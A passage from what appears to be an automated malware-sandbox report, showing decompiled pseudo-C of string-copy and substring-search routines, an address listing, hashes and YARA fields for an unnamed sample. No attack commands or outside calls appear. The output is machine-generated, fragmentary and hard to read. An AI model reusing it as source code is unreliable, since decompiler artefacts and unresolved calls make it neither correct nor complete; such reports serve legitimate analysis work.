													}
													_v32 = _t333;
													L163:
													__eflags = _t251;
													if(__eflags == 0) {
														goto L84;
													}
													if(__eflags > 0) {
														goto L85;
													}
													goto L90;
												}
												_t441 = _v32;
												_t353 = _t299;
												while(1) {
													__eflags =  *(_t441 + _t251 * 2) & 0x0000ffff;
													if(( *(_t441 + _t251 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t251 = _t251 + 1;
													__eflags = _t251 - _t299;
													if(_t251 < _t299) {
														continue;
													}
													_v32 = _t441;
													_t326 = _v52;
													goto L76;
												}
												_v32 = _t441;
												goto L163;
												L76:
												_t300 = _v32;
												_t248 =  ~( ~_t353 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t248;
												while(1) {
													asm("movdqu xmm1, [ebx+edx*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb ecx, xmm1");
													__eflags = _t326;
													if(_t326 != 0) {
														break;
													}
													_t353 = _t353 + 8;
													__eflags = _t353 - _t248;
													if(_t353 < _t248) {
														continue;
													}
													_v32 = _t300;
													__eflags = _t248 - 0x7fffffff;
													if(_t248 >= 0x7fffffff) {
														goto L84;
													}
													goto L80;
												}
												asm("bsf eax, eax");
												_v32 = _t300;
												_t251 = (_t326 >> 1) + _t353;
												goto L163;
											}
										}
										goto L40;
									}
									_t283 =  *_t321 & 0x0000ffff;
									 *_t421 = _t283;
									__eflags = _t283;
									if(_t283 == 0) {
										goto L34;
									}
									_v68 = _t398;
									_t284 = _t296;
									while(1) {
										_t284 = _t284 + 1;
										_t414 =  *(_t321 + _t284 * 4 - 2) & 0x0000ffff;
										 *(_t421 + _t284 * 4 - 2) = _t414;
										__eflags = _t414;
										if(_t414 == 0) {
											break;
										}
										_t415 =  *(_t321 + _t284 * 4) & 0x0000ffff;
										 *(_t421 + _t284 * 4) = _t415;
										__eflags = _t415;
										if(_t415 != 0) {
											continue;
										}
										break;
									}
									_t398 = _v68;
									goto L34;
								}
							}
							_t421 = _v40;
							goto L37;
						}
						_t288 = _t417 & 0x0000000f;
						__eflags = _t288;
						if(_t288 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t395 =  ~( ~_t288 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t395;
							while(1) {
								asm("movdqu xmm1, [esi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								__eflags = _t312;
								if(_t312 != 0) {
									break;
								}
								_t288 = _t288 + 8;
								__eflags = _t288 - _t395;
								if(_t288 < _t395) {
									continue;
								}
								__eflags = _t395 - 0x7fffffff;
								if(_t395 >= 0x7fffffff) {
									L22:
									_t418 = 0x40;
									_t345 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t417 + _t395 * 2) & 0x0000ffff;
									if(( *(_t417 + _t395 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t395 = _t395 + 1;
									__eflags = _t395 - 0x7fffffff;
									if(_t395 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L64:
								__eflags = _t345 - 0xfffffffe;
								if(_t345 != 0xfffffffe) {
									_t418 = 0x40;
								} else {
									 *_t417 = _t296;
									_t418 = _v36;
								}
								goto L23;
							}
							asm("bsf edx, ecx");
							_t345 = (_t395 >> 1) + _t288;
							goto L64;
						}
						_t395 = _t296;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							goto L20;
						}
						_t288 =  ~_t288 + 0x10 >> 1;
						__eflags = _t288;
						while(1) {
							_t312 =  *(_t417 + _t395 * 2) & 0x0000ffff;
							__eflags = _t312;
							if(_t312 == 0) {
								goto L64;
							}
							_t395 = _t395 + 1;
							__eflags = _t395 - _t288;
							if(_t395 < _t288) {
								continue;
							}
							goto L16;
						}
						goto L64;
					}
					_t227 =  &_v40;
					goto L38;
				}
				if(_t417 == 0) {
					L6:
					_push(2);
					_push(_t344);
					E004110B0();
					_t447 = _t447 + 8;
					goto L8;
				}
				_t293 =  *_t344 & 0x0000ffff;
				 *_t417 = _t293;
				if(_t293 == 0) {
					goto L6;
				}
				_t294 = 0;
				while(1) {
					_t294 = _t294 + 1;
					_t312 =  *(_t344 + _t294 * 4 - 2) & 0x0000ffff;
					 *(_t417 + _t294 * 4 - 2) = _t312;
					if(_t312 == 0) {
						goto L6;
					}
					_t312 =  *(_t344 + _t294 * 4) & 0x0000ffff;
					 *(_t417 + _t294 * 4) = _t312;
					if(_t312 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x0041a660
0x0041a66c
0x0041a66e
0x0041a672
0x0041a674
0x0041a678
0x0041a682
0x0041a684
0x0041a687
0x0041a68d
0x0041a6c7
0x0041a6ca
0x0041a6ce
0x0041a6d6
0x0041a6dc
0x0041a6e7
0x0041a6e9
0x0041ae6d
0x0041ae72
0x0041a76d
0x0041a772
0x0041a772
0x0041a775
0x0041a778
0x0041a77b
0x0041a77d
0x0041a792
0x0041a795
0x0041a795
0x0041a79a
0x0041a7a2
0x0041a7a2
0x0041a7a2
0x0041a7a3
0x0041a7aa
0x0041a7b4
0x0041a7b8
0x0041a7b9
0x0041a7bd
0x0041a7c2
0x0041a7c6
0x0041a7c8
0x0041a7cb
0x0041a7cf
0x0041a7d1
0x0041a819
0x00000000
0x0041a7d3
0x0041a7d3
0x0041a7d5
0x0041a804
0x0041a804
0x0041a806
0x0041a807
0x0041a80b
0x0041a810
0x0041a814
0x0041a81c
0x0041a820
0x0041a824
0x0041a828
0x0041a82c
0x0041a830
0x0041a836
0x0041a83b
0x0041a83b
0x0041a83d
0x0041a842
0x0041a84b
0x0041a84b
0x0041a850
0x0041a852
0x0041a85a
0x0041a85c
0x0041a85f
0x0041a863
0x0041a8a0
0x0041a94a
0x0041a94a
0x0041a94c
0x0041a953
0x0041a953
0x0041a955
0x0041a959
0x0041a961
0x0041a967
0x0041a974
0x0041a974
0x0041a867
0x0041a890
0x0041a890
0x0041a892
0x0041a893
0x0041a898
0x00000000
0x0041a898
0x0041a869
0x0041a86c
0x0041a871
0x00000000
0x00000000
0x0041a873
0x0041a875
0x0041a875
0x0041a876
0x0041a87b
0x0041a882
0x00000000
0x00000000
0x0041a884
0x0041a888
0x0041a88e
0x00000000
0x00000000
0x00000000
0x0041a88e
0x00000000
0x0041a875
0x0041a844
0x0041a849
0x0041a8a8
0x0041a8aa
0x0041a8ac
0x0041a8f5
0x0041a8f5
0x0041a8fa
0x0041a8fc
0x0041a904
0x0041a906
0x0041a909
0x0041a90b
0x0041a90d
0x0041a947
0x00000000
0x0041a947
0x0041a90f
0x0041a911
0x0041a93a
0x0041a93a
0x0041a93c
0x0041a93d
0x0041a942
0x00000000
0x0041a942
0x0041a913
0x0041a916
0x0041a919
0x0041a91b
0x00000000
0x00000000
0x0041a91d
0x0041a91f
0x0041a91f
0x0041a920
0x0041a925
0x0041a92a
0x0041a92c
0x00000000
0x00000000
0x0041a92e
0x0041a932
0x0041a936
0x0041a938
0x00000000
0x00000000
0x00000000
0x0041a938
0x00000000
0x0041a91f
0x0041a8b1
0x0041a8b3
0x00000000
0x00000000
0x0041a8b5
0x0041a8bc
0x0041a8c2
0x0041a8c5
0x0041a8c7
0x0041a8ca
0x0041a8ce
0x0041a8ce
0x0041a8d5
0x0041a8db
0x0041a8de
0x0041a8e1
0x00000000
0x00000000
0x0041a8e7
0x0041a8ec
0x0041a8ee
0x00000000
0x00000000
0x0041a8f0
0x0041a8f0
0x0041a8f3
0x0041a8f3
0x00000000
0x0041a8f3
0x0041a992
0x0041a996
0x0041a999
0x0041a99c
0x0041a99e
0x0041a9a0
0x00000000
0x00000000
0x0041a9a8
0x0041a9ab
0x0041a9af
0x0041a9b7
0x0041a9bf
0x0041a9c3
0x0041a9c7
0x0041a9cb
0x0041a9cf
0x0041a9d3
0x0041a9d7
0x0041a9e7
0x0041a9e7
0x0041a9e7
0x0041a9e9
0x0041a9eb
0x00000000
0x00000000
0x0041a9ed
0x0041a9ef
0x0041a9f1
0x0041aa5a
0x0041aa5a
0x0041aa5e
0x0041aa62
0x0041aa64
0x00000000
0x00000000
0x0041aa6a
0x0041aa6b
0x0041aa70
0x00000000
0x00000000
0x0041aa72
0x0041aa7a
0x0041aa7a
0x0041aa7f
0x0041aa7f
0x0041aa82
0x0041aa82
0x0041aa84
0x0041aa88
0x0041aa8c
0x0041aa93
0x0041aa99
0x0041aa9f
0x0041aaa2
0x0041aaa8
0x0041aaab
0x0041aaae
0x00000000
0x00000000
0x0041aaba
0x0041aabc
0x0041aac4
0x0041aac4
0x0041aac8
0x0041aaca
0x0041aacd
0x0041aacf
0x00000000
0x00000000
0x0041aad5
0x0041aad5
0x0041aad7
0x0041aad9
0x0041ab3a
0x0041ab3a
0x0041ab3d
0x0041ab5f
0x0041ab6b
0x0041ab6b
0x0041ab71
0x0041ab71
0x0041ab76
0x0041ab7a
0x0041ab7e
0x0041ab80
0x00000000
0x00000000
0x0041ab86
0x0041ab89
0x0041ab8b
0x00000000
0x00000000
0x0041ab8d
0x0041ab8f
0x0041ab95
0x0041aba8
0x0041aba8
0x0041abad
0x0041abb2
0x0041abb4
0x0041abb6
0x0041abb8
0x0041abbe
0x0041abbe
0x0041abc0
0x0041abc0
0x0041abc2
0x0041abc5
0x0041abc8
0x0041abca
0x0041ad2f
0x0041ad2f
0x0041ad39
0x0041ad3b
0x0041ad3e
0x0041ad40
0x0041ad42
0x0041ad7f
0x00000000
0x0041ad7f
0x0041ad44
0x0041ad46
0x0041ad6f
0x0041ad6f
0x0041ad71
0x0041ad72
0x0041ad77
0x00000000
0x0041ad77
0x0041ad48
0x0041ad4b
0x0041ad4e
0x0041ad50
0x00000000
0x00000000
0x0041ad52
0x0041ad54
0x0041ad54
0x0041ad55
0x0041ad5a
0x0041ad5f
0x0041ad61
0x00000000
0x00000000
0x0041ad63
0x0041ad67
0x0041ad6b
0x0041ad6d
0x00000000
0x00000000
0x00000000
0x0041ad6d
0x00000000
0x0041ad54
0x0041abd3
0x0041abd5
0x00000000
0x00000000
0x0041abdb
0x0041abdd
0x0041ac4d
0x0041ac52
0x0041ac52
0x0041ac55
0x0041ac58
0x0041ac5b
0x0041ac5d
0x0041ac70
0x0041ac73
0x0041ac73
0x0041ac79
0x0041ac81
0x0041ac81
0x0041ac81
0x0041ac82
0x0041ac89
0x0041ac93
0x0041ac97
0x0041ac98
0x0041ac9c
0x0041aca1
0x0041aca5
0x0041aca8
0x0041acaa
0x0041acac
0x0041acfc
0x00000000
0x0041acae
0x0041acae
0x0041acb0
0x0041acdf
0x0041acdf
0x0041ace1
0x0041ace2
0x0041ace6
0x0041acea
0x0041acef
0x0041acf3
0x0041acf7
0x0041acff
0x0041ad03
0x0041ad06
0x0041ad08
0x0041ad08
0x0041ad0a
0x00000000
0x00000000
0x0041ad10
0x0041ad1a
0x0041ad1a
0x0041ad1d
0x0041ad1e
0x0041ad21
0x0041ad23
0x00000000
0x00000000
0x0041ad25
0x0041ad27
0x0041ad8e
0x0041ad90
0x00000000
0x0041ad90
0x0041ad29
0x0041ad29
0x0041ad2b
0x0041ad99
0x00000000
0x0041ad99
0x0041ad14
0x0041ad17
0x0041ad17
0x0041ad17
0x0041ad1a
0x0041acb2
0x0041acb5
0x0041acb8
0x0041acba
0x0041acbd
0x00000000
0x00000000
0x00000000
0x00000000
0x0041acbf
0x0041acbf
0x0041acbf
0x0041acc0
0x0041acc5
0x0041acca
0x0041accc
0x00000000
0x00000000
0x0041acce
0x0041acd2
0x0041acd6
0x0041acd8
0x00000000
0x00000000
0x00000000
0x0041acd8
0x0041acda
0x0041acdd
0x0041acdd
0x00000000
0x0041acdd
0x0041acac
0x0041ac5f
0x00000000
0x0041ac5f
0x0041abe1
0x0041abe1
0x0041abe4
0x0041ac01
0x0041ac0d
0x0041ac0d
0x0041ac13
0x0041ac13
0x0041ac18
0x0041ac1c
0x0041ac20
0x0041ac22
0x00000000
0x00000000
0x0041ac28
0x0041ac2b
0x0041ac2d
0x00000000
0x00000000
0x0041ac2f
0x0041ac35
0x0041ac48
0x0041ac48
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ac37
0x0041ac37
0x0041ac3b
0x0041ac3d
0x00000000
0x00000000
0x0041ac3f
0x0041ac40
0x0041ac46
0x00000000
0x00000000
0x00000000
0x0041ac46
0x00000000
0x0041ac37
0x0041adbf
0x0041adc4
0x00000000
0x0041adc4
0x0041abe6
0x0041abe8
0x0041abeb
0x00000000
0x00000000
0x0041abf2
0x0041abf2
0x0041abf4
0x0041abf4
0x0041abf8
0x0041abfa
0x00000000
0x00000000
0x0041abfc
0x0041abfd
0x0041abff
0x00000000
0x00000000
0x00000000
0x0041abff
0x00000000
0x0041abf4
0x0041abba
0x0041abbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ab97
0x0041ab97
0x0041ab9b
0x0041ab9d
0x00000000
0x00000000
0x0041ab9f
0x0041aba0
0x0041aba6
0x00000000
0x00000000
0x00000000
0x0041aba6
0x00000000
0x0041ab97
0x0041adcb
0x0041adcd
0x0041adcf
0x0041add4
0x00000000
0x0041add4
0x0041ab3f
0x0041ab41
0x0041ab43
0x00000000
0x00000000
0x0041ab4a
0x0041ab4a
0x0041ab4c
0x0041ab50
0x0041ab52
0x00000000
0x00000000
0x0041ab58
0x0041ab59
0x0041ab5b
0x00000000
0x00000000
0x0041ab5d
0x0041ab5d
0x00000000
0x0041ab5d
0x0041ad87
0x00000000
0x0041ad87
0x0041aadb
0x0041aae0
0x0041aae2
0x0041aaea
0x0041aaec
0x0041aaef
0x0041aaf1
0x0041aaf3
0x0041ab30
0x00000000
0x0041ab30
0x0041aaf5
0x0041aaf7
0x0041ab20
0x0041ab20
0x0041ab22
0x0041ab23
0x0041ab28
0x00000000
0x0041ab28
0x0041aaf9
0x0041aafc
0x0041aaff
0x0041ab01
0x00000000
0x00000000
0x0041ab03
0x0041ab05
0x0041ab05
0x0041ab06
0x0041ab0b
0x0041ab10
0x0041ab12
0x00000000
0x00000000
0x0041ab14
0x0041ab18
0x0041ab1c
0x0041ab1e
0x00000000
0x00000000
0x00000000
0x0041ab1e
0x00000000
0x0041ab05
0x0041aabe
0x0041aabf
0x0041aac2
0x00000000
0x00000000
0x00000000
0x0041aac2
0x0041ade9
0x0041ade9
0x0041adec
0x00000000
0x00000000
0x0041adf6
0x0041adf8
0x00000000
0x00000000
0x0041adfe
0x0041ae02
0x0041ae02
0x0041ae04
0x0041ae04
0x0041ae0e
0x0041ae11
0x0041ae17
0x0041ae21
0x0041ae24
0x0041ae27
0x00000000
0x00000000
0x0041ae31
0x0041ae33
0x00000000
0x00000000
0x00000000
0x0041ae35
0x0041a9db
0x0041a9df
0x0041a9e3
0x00000000
0x0041a9e3
0x0041ae3a
0x0041adac
0x0041adac
0x0041adae
0x00000000
0x00000000
0x0041adb4
0x00000000
0x00000000
0x00000000
0x0041adba
0x0041a9f3
0x0041a9f7
0x0041a9f9
0x0041a9fd
0x0041a9ff
0x00000000
0x00000000
0x0041aa05
0x0041aa06
0x0041aa08
0x00000000
0x00000000
0x0041aa0a
0x0041aa12
0x00000000
0x0041aa12
0x0041ada0
0x00000000
0x0041aa16
0x0041aa22
0x0041aa26
0x0041aa26
0x0041aa2b
0x0041aa2b
0x0041aa30
0x0041aa34
0x0041aa38
0x0041aa3a
0x00000000
0x00000000
0x0041aa40
0x0041aa43
0x0041aa45
0x00000000
0x00000000
0x0041aa47
0x0041aa53
0x0041aa58
0x00000000
0x00000000
0x00000000
0x0041aa58
0x0041ae49
0x0041ae4e
0x0041ae52
0x00000000
0x0041ae58
0x0041a9e7
0x00000000
0x0041a849
0x0041a7d7
0x0041a7da
0x0041a7dd
0x0041a7df
0x00000000
0x00000000
0x0041a7e1
0x0041a7e4
0x0041a7e6
0x0041a7e6
0x0041a7e7
0x0041a7ec
0x0041a7f1
0x0041a7f3
0x00000000
0x00000000
0x0041a7f5
0x0041a7f9
0x0041a7fd
0x0041a7ff
0x00000000
0x00000000
0x00000000
0x0041a7ff
0x0041a801
0x00000000
0x0041a801
0x0041a7d1
0x0041a77f
0x00000000
0x0041a77f
0x0041a6f1
0x0041a6f1
0x0041a6f4
0x0041a714
0x0041a718
0x0041a724
0x0041a724
0x0041a72a
0x0041a72a
0x0041a72f
0x0041a733
0x0041a737
0x0041a739
0x00000000
0x00000000
0x0041a73f
0x0041a742
0x0041a744
0x00000000
0x00000000
0x0041a746
0x0041a74c
0x0041a763
0x0041a763
0x0041a768
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a74e
0x0041a74e
0x0041a752
0x0041a754
0x00000000
0x00000000
0x0041a75a
0x0041a75b
0x0041a761
0x00000000
0x00000000
0x00000000
0x0041a761
0x0041a977
0x0041a977
0x0041a97a
0x0041a988
0x0041a97c
0x0041a97c
0x0041a97f
0x0041a97f
0x00000000
0x0041a97a
0x0041ae61
0x0041ae66
0x00000000
0x0041ae66
0x0041a6f6
0x0041a6f8
0x0041a6fa
0x00000000
0x00000000
0x0041a701
0x0041a701
0x0041a703
0x0041a703
0x0041a707
0x0041a709
0x00000000
0x00000000
0x0041a70f
0x0041a710
0x0041a712
0x00000000
0x00000000
0x00000000
0x0041a712
0x00000000
0x0041a703
0x0041a6de
0x00000000
0x0041a6de
0x0041a691
0x0041a6ba
0x0041a6ba
0x0041a6bc
0x0041a6bd
0x0041a6c2
0x00000000
0x0041a6c2
0x0041a693
0x0041a696
0x0041a69b
0x00000000
0x00000000
0x0041a69d
0x0041a69f
0x0041a69f
0x0041a6a0
0x0041a6a5
0x0041a6ac
0x00000000
0x00000000
0x0041a6ae
0x0041a6b2
0x0041a6b8
0x00000000
0x00000000
0x00000000
0x0041a6b8
0x00000000

Strings

@, xrefs: 0041A6CE

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction ID: 2b86c9cbcb909092bc9e41d174b5cca26deb6003ab0c5a8be9a4e590700dc3ec
Opcode Fuzzy Hash: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction Fuzzy Hash: 6132E771A1671287C7248F29C45027B73E2BFC4714B28862EE99587394EB39DCE6C35B

Uniqueness

Uniqueness Score: -1.00%

Function 00421EB0, Relevance: 1.9, Strings: 1, Instructions: 682
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00421EB0(intOrPtr* __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t210;
				signed int _t211;
				signed int* _t217;
				char* _t221;
				signed int* _t222;
				intOrPtr _t227;
				signed int _t232;
				signed int _t235;
				signed int _t239;
				signed int _t241;
				signed int* _t247;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t265;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				char _t276;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t283;
				intOrPtr* _t286;
				signed int _t287;
				signed int _t291;
				signed int _t293;
				signed int _t294;
				void* _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t303;
				char _t304;
				char _t305;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				void* _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr* _t325;
				char _t326;
				signed int _t327;
				intOrPtr* _t329;
				signed int _t330;
				signed int _t331;
				void* _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				void* _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				void* _t343;
				intOrPtr* _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				char _t357;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				char _t368;
				char _t369;
				char _t370;
				signed int _t372;
				unsigned int _t377;
				signed int _t379;
				intOrPtr _t381;
				signed int _t385;
				signed int _t386;
				signed char* _t392;
				signed int _t393;
				signed int _t395;
				signed int _t401;
				signed int _t402;
				unsigned int _t408;
				signed int _t410;
				void* _t411;
				signed int _t417;
				signed int _t421;
				signed int _t427;
				signed int _t428;
				void* _t431;

				_v56 = 0;
				_t286 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t372 = E00411030();
				_t431 = (_t428 & 0xfffffff0) - 0x34 + 4;
				_t210 = _v56;
				if(_t210 == 0) {
					 *_t372 = 0;
				} else {
					if(_t372 != 0) {
						_t368 =  *_t210;
						 *_t372 = _t368;
						if(_t368 != 0) {
							_t319 = 0;
							while(1) {
								_t319 = _t319 + 1;
								_t369 =  *((char*)(_t210 + _t319 * 2 - 1));
								 *((char*)(_t372 + _t319 * 2 - 1)) = _t369;
								if(_t369 == 0) {
									goto L6;
								}
								_t370 =  *((char*)(_t210 + _t319 * 2));
								 *((char*)(_t372 + _t319 * 2)) = _t370;
								if(_t370 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(1);
					_push(_t210);
					E004110B0();
					_t431 = _t431 + 8;
				}
				_t211 = _a8;
				_v52 = 0x40;
				_v56 = _t372;
				if(_t211 != 0) {
					__eflags = _t372;
					if(_t372 == 0) {
						_t302 = 0x40;
						_t401 = 0;
					} else {
						_t366 = _t372 & 0x0000000f;
						__eflags = _t366;
						if(_t366 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t427 =  ~( ~_t366 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t427;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t211;
								if(_t211 != 0) {
									break;
								}
								_t366 = _t366 + 0x10;
								__eflags = _t366 - _t427;
								if(_t366 < _t427) {
									continue;
								} else {
									__eflags = _t427 - 0x7fffffff;
									if(_t427 >= 0x7fffffff) {
										L21:
										_t302 = 0x40;
										_t401 = 0x7fffffff;
									} else {
										while(1) {
											__eflags =  *((char*)(_t427 + _t372));
											if( *((char*)(_t427 + _t372)) == 0) {
												goto L174;
											}
											_t427 = _t427 + 1;
											__eflags = _t427 - 0x7fffffff;
											if(_t427 < 0x7fffffff) {
												continue;
											} else {
												goto L21;
											}
											goto L22;
										}
										goto L174;
									}
								}
								goto L22;
							}
							asm("bsf esi, eax");
							_t401 = _t427 + _t366;
							goto L174;
						} else {
							_t401 = 0;
							_t366 =  ~_t366 + 0x10;
							__eflags = _t366;
							while(1) {
								__eflags =  *((char*)(_t401 + _t372));
								if( *((char*)(_t401 + _t372)) == 0) {
									break;
								}
								_t401 = _t401 + 1;
								__eflags = _t401 - _t366;
								if(_t401 < _t366) {
									continue;
								} else {
									goto L15;
								}
								goto L22;
							}
							L174:
							__eflags = _t401 - 0xfffffffe;
							if(_t401 != 0xfffffffe) {
								_t302 = 0x40;
							} else {
								 *_t372 = 0;
								_t302 = _v52;
							}
						}
					}
					L22:
					_t20 = _t401 + 2; // 0x80000001
					_t320 = _t20;
					__eflags = _t320 - 0x40;
					_t321 =  <=  ? 0x40 : _t320;
					__eflags = _t302 - _t321;
					if(_t302 < _t321) {
						_t377 = (_t321 >> 5 >> 0x1a) + _t321 >> 6;
						_t322 = _t321 & 0x8000003f;
						__eflags = _t322;
						if(_t322 < 0) {
							_t322 = (_t322 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t322;
						}
						__eflags = _t322;
						_t379 = _t377 + (0 | _t322 > 0x00000000) << 6;
						_push(_t379);
						_t303 = E00411030();
						_t431 = _t431 + 4;
						_t323 = _v56;
						__eflags = _t323;
						if(_t323 == 0) {
							 *_t303 = 0;
						} else {
							__eflags = _t303;
							if(_t303 != 0) {
								_t282 =  *_t323;
								 *_t303 = _t282;
								__eflags = _t282;
								if(_t282 != 0) {
									_v60 = _t379;
									_t283 = 0;
									__eflags = 0;
									_v64 = _t401;
									_v68 = _t286;
									while(1) {
										_t283 = _t283 + 1;
										_t299 =  *((char*)(_t323 + _t283 * 2 - 1));
										 *(_t303 + _t283 * 2 - 1) = _t299;
										__eflags = _t299;
										if(_t299 == 0) {
											break;
										}
										_t300 =  *((char*)(_t323 + _t283 * 2));
										 *(_t303 + _t283 * 2) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											continue;
										}
										break;
									}
									_t379 = _v60;
									_t401 = _v64;
									_t286 = _v68;
								}
							}
							_push(1);
							_push(_t323);
							_v68 = _t303;
							E004110B0();
							_t303 = _v68;
							_t431 = _t431 + 8;
						}
						_v52 = _t379;
						_v56 = _t303;
					} else {
						_t303 = _v56;
					}
					 *((char*)(_t303 + _t401)) = _a8;
					_t217 =  &_v56;
					 *((char*)(_t401 +  *_t217 + 1)) = 0;
				} else {
					_t217 =  &_v56;
				}
				_t402 =  *_t217;
				if(_t402 == 0) {
					L39:
					_t325 = _a4;
					_push(0x40);
					 *_t325 = 0;
					 *((intOrPtr*)(_t325 + 4)) = 0;
					_t287 = E00411030();
					_t431 = _t431 + 4;
					_t221 =  *_a4;
					if(_t221 == 0) {
						 *_t287 = 0;
					} else {
						if(_t287 != 0) {
							_t326 =  *_t221;
							 *_t287 = _t326;
							if(_t326 != 0) {
								_t327 = 0;
								while(1) {
									_t327 = _t327 + 1;
									_t304 =  *((char*)(_t221 + _t327 * 2 - 1));
									 *((char*)(_t287 + _t327 * 2 - 1)) = _t304;
									if(_t304 == 0) {
										goto L45;
									}
									_t305 =  *((char*)(_t221 + _t327 * 2));
									 *((char*)(_t287 + _t327 * 2)) = _t305;
									if(_t305 != 0) {
										continue;
									}
									goto L45;
								}
							}
						}
						L45:
						_push(1);
						_push(_t221);
						E004110B0();
						_t431 = _t431 + 8;
					}
					goto L124;
				} else {
					_t227 =  *_t402;
					_v40 = _t227;
					if(_t227 != 0) {
						_v64 =  *_t286;
						_t307 = E00425A90( *_t286, _t402);
						__eflags = _t307;
						if(_t307 == 0) {
							_t329 = _a4;
							_push(0x40);
							 *_t329 = 0;
							 *((intOrPtr*)(_t329 + 4)) = 0;
							_t287 = E00411030();
							_t431 = _t431 + 4;
							_t232 =  *_a4;
							__eflags = _t232;
							if(_t232 == 0) {
								 *_t287 = 0;
							} else {
								__eflags = _t287;
								if(_t287 != 0) {
									_t330 =  *_t232;
									 *_t287 = _t330;
									__eflags = _t330;
									if(_t330 != 0) {
										_t331 = 0;
										__eflags = 0;
										while(1) {
											_t331 = _t331 + 1;
											_t308 =  *((char*)(_t232 + _t331 * 2 - 1));
											 *(_t287 + _t331 * 2 - 1) = _t308;
											__eflags = _t308;
											if(_t308 == 0) {
												goto L172;
											}
											_t309 =  *((char*)(_t232 + _t331 * 2));
											 *(_t287 + _t331 * 2) = _t309;
											__eflags = _t309;
											if(_t309 != 0) {
												continue;
											}
											goto L172;
										}
									}
								}
								L172:
								_push(1);
								_push(_t232);
								E004110B0();
								_t431 = _t431 + 8;
							}
							goto L124;
						} else {
							_t381 = _v40;
							_t235 = _t402 & 0x0000000f;
							_v36 = _t235;
							asm("pxor xmm0, xmm0");
							_v20 = _t402;
							_v44 = _t381 - 0x41;
							_v24 =  ~_t235 + 0x10;
							_v48 = _t381 + 0x20;
							_t333 = 0;
							__eflags = 0;
							while(1) {
								L49:
								_t385 = _t307;
								_t291 = _t307 + 1;
								__eflags = _t291;
								if(_t291 == 0) {
									break;
								}
								__eflags =  *(_t307 + 1);
								if( *(_t307 + 1) != 0) {
									__eflags = _v44 - 0x19;
									_t411 = _t333;
									_t268 =  <=  ? _v48 : _v40;
									_t269 =  <=  ? _v48 : _v40;
									_v60 = _t385;
									_v28 =  <=  ? _v48 : _v40;
									while(1) {
										_t411 = _t411 + 1;
										_t291 = _t291 + 1;
										_t392 = _t307 + _t411;
										_v32 = _t392;
										_t393 =  *_t392 & 0x000000ff;
										__eflags =  *((char*)(_t291 - 1)) + 0xffffffbf - 0x19;
										_t394 =  <=  ? _t393 + 0x20 : _t393;
										_t272 =  <=  ? _t393 + 0x20 : _t393;
										__eflags = ( <=  ? _t393 + 0x20 : _t393) - _v28;
										if(( <=  ? _t393 + 0x20 : _t393) == _v28) {
											break;
										}
										__eflags =  *_t291;
										if( *_t291 != 0) {
											continue;
										} else {
											L54:
											_t385 = _v60;
										}
										goto L55;
									}
									_t307 = _v32;
									_t355 = _v36;
									_t273 = _v24;
									do {
										_t395 = _t355;
										__eflags = _t355;
										if(_t355 == 0) {
											L136:
											_v24 = _t273;
											_t417 =  ~( ~_t395 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											__eflags = _t417;
											_t274 = _v20;
											while(1) {
												asm("movdqu xmm1, [eax+edi]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb ebx, xmm1");
												__eflags = _t291;
												if(_t291 != 0) {
													break;
												}
												_t395 = _t395 + 0x10;
												__eflags = _t395 - _t417;
												if(_t395 < _t417) {
													continue;
												} else {
													_v20 = _t274;
													_t275 = _v24;
													__eflags = _t417 - 0x7fffffff;
													if(_t417 >= 0x7fffffff) {
														goto L144;
													} else {
														_t291 = _v20;
														while(1) {
															__eflags =  *((char*)(_t417 + _t291));
															if( *((char*)(_t417 + _t291)) == 0) {
